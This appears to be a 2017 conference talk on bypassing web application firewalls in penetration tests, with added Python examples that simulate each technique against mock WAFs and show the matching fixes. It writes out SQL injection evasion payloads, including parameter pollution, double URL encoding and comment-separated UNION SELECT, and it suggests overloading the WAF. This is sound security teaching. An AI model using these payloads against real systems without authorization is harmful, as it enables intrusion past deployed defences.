Bypassing Web Application Firewalls


Bypassing Web Application Firewalls: an approach for pentesters
Khalil Bijjou, Security Consultant
17th November 2017

BYPASSING A WAF: WHY?
- The number of deployed Web Application Firewalls (WAFs) is increasing
- WAFs make a penetration test more difficult
- Attempting to bypass a WAF is therefore an important part of a penetration test

MAIN GOAL
Provide penetration testers with a practical approach to bypassing WAFs, so that the test results reflect the real security of the application rather than the WAF in front of it.

Introduction to Web Application Firewalls

OVERVIEW
- Complements rather than replaces traditional firewalls and IDS/IPS, which do not understand HTTP
- Understands HTTP traffic far better than a network firewall
- Protects a web application by adding a security layer in front of it
- Checks requests for malicious content and blocks them

FUNCTIONALITY
- Pre-processor: decides whether a request will be processed (inspected) further at all
- Normalization: standardizes user input before any rule is applied
- Input validation: checks the normalized input against the rule set

NORMALIZATION FUNCTIONS
- Simplify the writing of rules: the rule author needs no knowledge of the different encodings input may arrive in
- compresswhitespace: converts runs of whitespace characters to a single space
- hexdecode: decodes a hex-encoded string
- lowercase: converts characters to lowercase
- urldecode: decodes a URL-encoded string

INPUT VALIDATION
- Security models define how rules are enforced
- Rules consist of regular expressions
- Three security models: 1. Positive Security Model 2. Negative Security Model 3. Hybrid Security Model

SECURITY MODELS
Positive Security Model (Whitelist):
- Deny all but known good
- Can block zero-day exploits, since unknown input is denied by default
- More secure than a blacklist
- A comprehensive understanding of the application is needed
- Creating rules is a time-consuming process
Negative Security Model (Blacklist):
- Allow all but known bad
- Shipped with the WAF: fast adoption, little knowledge needed
- One rule set can protect several applications
- Prone to false positives, and misses attacks the rules do not cover
- Resource-consuming
The Hybrid Security Model combines both: a whitelist for well-understood parts of the application, a blacklist for the rest.

Bypassing Methods and Techniques

OVERVIEW
- Pre-processor exploitation: make the WAF skip input validation
- Impedance mismatch: the WAF interprets input differently than the back end
- Rule set bypassing: use payloads that the WAF's rules do not detect

Pre-processor Exploitation

SKIPPING PARAMETER VERIFICATION
- PHP strips leading whitespace from parameter names and converts remaining spaces (and dots) into underscores:
  http://www.website.com/products.php?%20productid=select%201,2,3
- Classic ASP removes a % character that is not followed by two hexadecimal digits:
  http://www.website.com/products.aspx?%productid=select%201,2,3
- The WAF sees an unknown parameter name ("%20productid", "%productid") while the back end sees "productid"
- A WAF that does not reject unknown parameters, or validates only the parameters it knows, may be bypassed
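The following is an added example, not code from the talk or from WAFNinja. It models the parameter-name mangling described above (the PHP and classic ASP behaviour is implemented as a simplified assumption, not copied from either runtime) and contrasts a WAF that validates only the parameters it knows against one that rejects unknown names and validates every value. The query strings are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed models of back-end parameter-name handling (assumptions,
# not reference implementations of PHP or classic ASP).
def php_param_name(raw):
    """PHP: leading spaces are dropped, remaining spaces and dots become '_'."""
    name = unquote_plus(raw).lstrip(" ")
    return re.sub(r"[ .]", "_", name)

def asp_param_name(raw):
    """Classic ASP: a '%' not followed by two hex digits is silently removed."""
    return unquote_plus(re.sub(r"%(?![0-9A-Fa-f]{2})", "", raw))

def waf_param_name(raw):
    """A WAF that URL-decodes once but applies no back-end-specific mangling."""
    return unquote_plus(raw)

# The single blacklist rule the WAF applies to parameter values.
SQLI = re.compile(r"(?i)\b(select|union|insert|update|delete)\b")

def split_query(query):
    """Ordered (raw_name, decoded_value) pairs from a query string."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, unquote_plus(value)))
    return pairs

def backend_value(query, name_fn, wanted="productid"):
    """Value the back end reads for `wanted` after its own name mangling."""
    for name, value in split_query(query):
        if name_fn(name) == wanted:
            return value
    return None

def waf_allows(query, known=("productid",)):
    """Weak WAF: validates only parameters it knows; unknown names pass through."""
    for name, value in split_query(query):
        if waf_param_name(name) in known and SQLI.search(value):
            return False
    return True

def strict_waf_allows(query, known=("productid",)):
    """Hardened WAF: unknown parameter names are rejected (positive model)
    and every value is validated regardless of its name."""
    for name, value in split_query(query):
        if waf_param_name(name) not in known or SQLI.search(value):
            return False
    return True

if __name__ == "__main__":
    for q, fn in (("%20productid=select%201,2,3", php_param_name),
                  ("%productid=select%201,2,3", asp_param_name)):
        print(q, "| weak WAF allows:", waf_allows(q),
              "| back end reads:", backend_value(q, fn),
              "| strict WAF allows:", strict_waf_allows(q))
```

The weak WAF lets both requests through because it never matches the mangled name to a rule, while each back end still receives `select 1,2,3` in `productid`. The fix is the positive model: reject parameter names the application does not define, and never make validation conditional on the name at all.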

MALFORMED HTTP METHOD
- Misconfigured web servers may accept malformed HTTP methods
- A WAF that only inspects GET and POST requests may be bypassed

OVERLOADING THE WAF
- A WAF may be configured to skip input validation (fail open) when under heavy load
- Often applies to embedded WAFs
- A large number of malicious requests can be sent in the hope that the WAF overloads and lets some of them through
- Agree this with the customer beforehand: it is a load test as much as a bypass attempt

Impedance Mismatch

HTTP PARAMETER POLLUTION
- Sending a number of parameters with the same name
- Technologies interpret this request differently:
  http://www.website.com/products/?productid=1&productid=2

  Back end  | Behavior               | Processed
  ASP.NET   | Concatenate with comma | productid=1,2
  JSP       | First occurrence       | productid=1
  PHP       | Last occurrence        | productid=2

HTTP PARAMETER POLLUTION
- The payload ?productid=select 1,2,3 from table can be divided:
  ?productid=select 1&productid=2,3 from table
- The WAF sees two individual parameters and may not detect the payload
- An ASP.NET back end concatenates both values and receives the complete payload
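An added example (not part of the talk or of WAFNinja) that models the three back-end behaviours from the table and shows why a WAF that evaluates each occurrence of a parameter separately misses the split payload. The back-end behaviours are a simplified model, and the query string is constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# The rule the WAF applies to each parameter value: a SELECT ... FROM statement.
SQLI = re.compile(r"(?i)\bselect\b.+\bfrom\b")

def split_pairs(query):
    """Ordered (name, value) pairs; duplicate names are kept, not merged."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def backend_view(pairs, technology, name="productid"):
    """Model of how each back end resolves a repeated parameter (assumption)."""
    values = [v for n, v in pairs if n == name]
    if not values:
        return None
    if technology == "aspnet":
        return ",".join(values)      # concatenates with a comma
    if technology == "jsp":
        return values[0]             # first occurrence wins
    if technology == "php":
        return values[-1]            # last occurrence wins
    raise ValueError(f"unknown back end: {technology}")

def waf_blocks(pairs):
    """WAF that evaluates every occurrence on its own (the weak behaviour)."""
    return any(SQLI.search(value) for _, value in pairs)

def waf_blocks_merged(pairs, technology, name="productid"):
    """WAF that reassembles the value the way the protected back end will."""
    merged = backend_view(pairs, technology, name)
    return bool(merged and SQLI.search(merged))

# Constructed polluted request: the payload is split across two occurrences.
POLLUTED = "productid=select%201&productid=2,3%20from%20table"

if __name__ == "__main__":
    pairs = split_pairs(POLLUTED)
    print("per-occurrence WAF blocks:", waf_blocks(pairs))
    for tech in ("aspnet", "jsp", "php"):
        print(tech, "sees:", repr(backend_view(pairs, tech)),
              "| back-end-aware WAF blocks:", waf_blocks_merged(pairs, tech))
```

Only the ASP.NET back end reconstructs `select 1,2,3 from table`, which is also the only case where the back-end-aware WAF blocks; against JSP or PHP the split payload is not a working injection in the first place. This is why Phase 3 below depends on knowing the back-end technology: the mismatch has to exist on both sides for the technique to pay off.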

DOUBLE URL ENCODING
- The WAF normalizes URL-encoded characters into ASCII text
- The WAF may be configured to decode characters only once
- Double URL encoding a payload may therefore result in a bypass:
  s -> %73 -> %25%37%33
- The following payload contains a double URL encoded character:
  1 union %25%37%33elect 1,2,3
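An added example, not from the talk or from WAFNinja, that implements the normalization chain from the "Normalization functions" slide (urldecode, compresswhitespace, lowercase, plus a standalone hexdecode) and runs the double-encoded payload through it once and to a fixed point. The function names and the rule regex are this example's own.

```python
import re
from urllib.parse import unquote

# Rule applied after normalization (input is already lowercased).
UNION_SELECT = re.compile(r"\bunion\b\s+\bselect\b")

def double_url_encode(text):
    """Encode every character, then encode every character of the result
    (s -> %73 -> %25%37%33), as on the slide."""
    once = "".join(f"%{ord(c):02X}" for c in text)
    return "".join(f"%{ord(c):02X}" for c in once)

def hex_decode(value):
    """hexdecode: decode only a string made entirely of hex digits (even length);
    a rule set applies this to inputs expected to be hex, not to free text."""
    if len(value) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", value):
        return bytes.fromhex(value).decode("latin-1")
    return value

def normalize(value, decode_passes=1):
    """urldecode a fixed number of times, then compresswhitespace and lowercase."""
    for _ in range(decode_passes):
        value = unquote(value)
    value = re.sub(r"\s+", " ", value)
    return value.lower()

def normalize_fixed_point(value, max_passes=5):
    """urldecode until the value stops changing (bounded), then the rest of the chain."""
    for _ in range(max_passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return normalize(value, decode_passes=0)

def blocked_single_pass(payload):
    """WAF configured to decode exactly once."""
    return bool(UNION_SELECT.search(normalize(payload, decode_passes=1)))

def blocked_fixed_point(payload):
    """WAF that decodes repeatedly before matching."""
    return bool(UNION_SELECT.search(normalize_fixed_point(payload)))

if __name__ == "__main__":
    payload = "1 union " + double_url_encode("s") + "elect 1,2,3"
    print(payload)                                   # 1 union %25%37%33elect 1,2,3
    print("single decode sees:", normalize(payload, 1))
    print("blocked (single pass):", blocked_single_pass(payload))
    print("blocked (fixed point):", blocked_fixed_point(payload))
```

The single-pass WAF still sees `%73elect` and lets the request through; whatever decodes the value a second time behind it (the web server or the application itself) produces `select`. Decoding to a fixed point closes this particular gap but creates the opposite impedance mismatch: if the back end decodes only once, `%73elect` is a literal string there, and the WAF now blocks input the application would have treated as harmless. The correct number of decoding passes is the number the stack behind the WAF actually performs.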

Rule Set Bypassing

BYPASS RULE SET
Two methods:
- Brute force by enumerating payloads
- Reverse-engineer the WAF's rule set

APPROACH FOR PENETRATION TESTERS

OVERVIEW
- Similar to the phases of a penetration test
- Divided into Phases 0 to 6; Phase 0 is not always possible

PHASE 0 - DISABLE WAF
Objective: find security flaws in the application more easily
- The assessment of the application's own security level is more accurate without the WAF
- Allows a more focused approach once the WAF is enabled again
- May not be realizable in some penetration tests

PHASE 1 - RECONNAISSANCE
Objective: gather information to get an overview of the target; the basis for the subsequent phases
Gather information about:
- web server
- programming language
- WAF and its security model
- internal IP addresses

PHASE 2 - ATTACKING THE PRE-PROCESSOR
Objective: make the WAF skip input validation
Identify which parts of an HTTP request are inspected by the WAF in order to develop an exploit:
1. Send individual requests that differ only in the location of a payload
2. Observe which requests are blocked
3. Attempt to develop an exploit

PHASE 3 - FINDING AN IMPEDANCE MISMATCH
Objective: make the WAF interpret a request differently than the back end, so that the WAF does not detect it
- Knowledge of the back-end technologies (from Phase 1) is needed

PHASE 4 - BYPASSING THE RULE SET
Objective: find a payload that is not blocked by the WAF's rule set
1. Brute force by sending different payloads
2. Reverse-engineer the rule set in a trial-and-error approach:
   1. Send symbols and keywords that may be useful to craft a payload
   2. Observe which of them are blocked
   3. Attempt to develop an exploit based on the results of the previous steps
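An added example covering the procedures of Phase 2 and Phase 4 together; it is not code from the talk or from WAFNinja. The WAF is a constructed stand-in (a short regex blacklist that inspects only the query string and body) so the example runs offline; its rules, the request model and the token list are assumptions made for illustration, and the same probing functions would be pointed at a real target by replacing `mock_waf_blocks` with a function that sends the request and reports whether it was blocked.

```python
import re

# Constructed stand-in for a blacklist WAF (not any product's rule set):
# it inspects only the query string and the body, and its UNION SELECT rule
# requires whitespace between the two keywords.
BLOCKLIST = [
    re.compile(r"(?i)\bunion\s+select\b"),
    re.compile(r"(?i)\bor\s+1\s*=\s*1\b"),
    re.compile(r"--|#"),
]

def mock_waf_blocks(request):
    """True if the stand-in WAF would reject this request."""
    inspected = (request["query"], request["body"])
    return any(rule.search(part) for part in inspected for rule in BLOCKLIST)

LOCATIONS = ("query", "body", "cookie", "header", "path")

def build_request(location, payload):
    """Minimal request model: the payload goes into exactly one location."""
    req = {"method": "POST", "path": "/products",
           "query": "", "body": "", "cookie": "", "header": ""}
    if location in ("query", "body", "cookie"):
        req[location] = f"productid={payload}"
    else:
        req[location] = payload
    return req

def probe_locations(waf, payload="1 union select 1,2,3"):
    """Phase 2: the same payload in each location; True means blocked.
    Locations that are never blocked are not inspected by the WAF."""
    return {loc: waf(build_request(loc, payload)) for loc in LOCATIONS}

# Phase 4 probe set: symbols and keywords useful for building SQL payloads.
TOKENS = ["union", "select", "from", "or", "and", "--", "#", "/**/",
          "'", "(", ")", ",", "1=1"]

def fuzz_tokens(waf, tokens=TOKENS):
    """Phase 4: one token per request; True means the token passed."""
    return {t: not waf(build_request("query", f"1 {t} 2")) for t in tokens}

def craft_payload(allowed):
    """Build UNION SELECT from tokens that passed individually: if the
    comment sequence is allowed, use it instead of whitespace (valid in
    MySQL, where /**/ separates tokens like a space)."""
    separator = "/**/" if allowed.get("/**/") else " "
    return separator.join(["1", "union", "select", "1,2,3"])

if __name__ == "__main__":
    print("Phase 2, blocked per location:", probe_locations(mock_waf_blocks))
    allowed = fuzz_tokens(mock_waf_blocks)
    print("Phase 4, tokens that passed:", [t for t, ok in allowed.items() if ok])
    payload = craft_payload(allowed)
    print("crafted:", payload, "| blocked:",
          mock_waf_blocks(build_request("query", payload)))
```

Against this stand-in, Phase 2 shows that cookies, headers and the path are never inspected, and Phase 4 shows that `union`, `select` and `/**/` each pass on their own while `--` and `#` do not; combining the allowed tokens gives a payload the rule does not match. Against a real WAF the per-token results are what reveal how the rules are anchored, which is exactly the information WAFNinja's fuzzing mode collects.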

PHASE 5 - OTHER VULNERABILITIES
Objective: find vulnerabilities that a WAF cannot detect, for example:
- broken authentication mechanisms
- privilege escalation
- etc.

PHASE 6 - AFTER THE PENTEST
Objective: inform the customer about the vulnerabilities
- Advise the customer to fix the root cause of each vulnerability
- Until that fix is deployed, the vulnerability should be virtually patched by adding specific rules to the WAF
- Explain that the WAF can help mitigate a vulnerability but cannot fix it

WAFNINJA

OVERVIEW
- CLI tool written in Python
- Automates parts of the approach
- Already used in several penetration tests
- Supports HTTPS connections, GET and POST parameters, cookies, and usage together with an intercepting browser

FUZZING
- Sends different symbols and keywords and analyzes the responses
- Results are displayed in a clear and concise way
- Fuzzing strings can be extended with the insert-fuzz function and shared within a team

DISCUSSION & QUESTIONS
WAFNinja: https://github.com/khalilbijjou/wafninja
E-Mail: kh.bijjou@gmail.com
LinkedIn / Xing: Khalil Bijjou